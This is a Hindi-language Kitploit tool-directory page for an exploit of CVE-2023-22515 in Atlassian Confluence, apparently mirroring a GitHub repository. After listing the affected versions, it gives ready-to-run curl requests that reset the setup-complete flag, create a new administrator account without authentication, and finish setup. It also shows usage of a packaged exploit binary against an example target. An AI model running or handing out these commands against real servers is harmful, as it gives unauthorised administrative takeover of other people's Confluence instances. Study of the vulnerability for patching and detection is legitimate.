Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-22515 — Confluence में अनधिकृत रूप से व्यवस्थापक उपयोगकर्ता जोड़ने का शोषण उपकरण (CVE-2023-22515) | Kitploit
उपकरण/GitHubGitHub/ad-calcium/cve-2023-22515
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंग
GitHubad-calcium/cve-2023-22515

CVE-2023-22515

Confluence में अनधिकृत रूप से व्यवस्थापक उपयोगकर्ता जोड़ने का शोषण उपकरण (CVE-2023-22515)

रिपॉजिटरी देखें
110812 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

रेड टीम टूल - Confluence अनधिकृत व्यवस्थापक उपयोगकर्ता जोड़ें (CVE-2023-22515) भेद्यता शोषण उपकरण

भेद्यता प्रभाव क्षेत्र

root@kitploit:~
8.0.0 <= Confluence Data Center and Confluence Server <= 8.0.4
8.1.0 <= Confluence Data Center and Confluence Server <= 8.1.4
8.2.0 <= Confluence Data Center and Confluence Server <= 8.2.3
8.3.0 <= Confluence Data Center and Confluence Server <= 8.3.2
8.4.0 <= Confluence Data Center and Confluence Server <= 8.4.2
8.5.0 <= Confluence Data Center and Confluence Server <= 8.5.1

भेद्यता शोषण

1. सामान्य पहुँच, स्थापना पूर्ण होने का संकेत

root@kitploit:~
curl -vk http://IP/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false

2. व्यवस्थापक उपयोगकर्ता बनाएं

root@kitploit:~
test123 Password2

निम्नलिखित कमांड निष्पादित करें

root@kitploit:~
curl -vk -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=test123&fullName=test123&email=test123@localhost&password=Password2&confirm=Password2&setup-next-button=Next" http://IP/setup/setupadministrator.action

3. सेटअप पूर्ण

root@kitploit:~
curl -vk -X POST -H "X-Atlassian-Token: no-check" http://IP/setup/finishsetup.action

उपयोग

root@kitploit:~
cve-2023-22515.exe
Usage of cve-2023-22515.exe:
  -pass string
        指定要添加的密码
  -proxy string
        设置代理
  -u string
        指定目标
  -user string
        指定要添加的用户名

यादृच्छिक खाता पासवर्ड

root@kitploit:~
cve-2023-22515.exe -u http://10.108.3.117:8090

image-2023101116485852

मैन्युअल रूप से व्यवस्थापक उपयोगकर्ता जोड़ें

root@kitploit:~
cve-2023-22515.exe -u http://10.108.3.117:8090 -user tesxe17 -pass Password2

image-20231011164858593

अद्यतन लॉग

root@kitploit:~
[+] 2023/10/16 增加随机用户名密码

Star History

Star History Chart

टूल डाउनलोड करें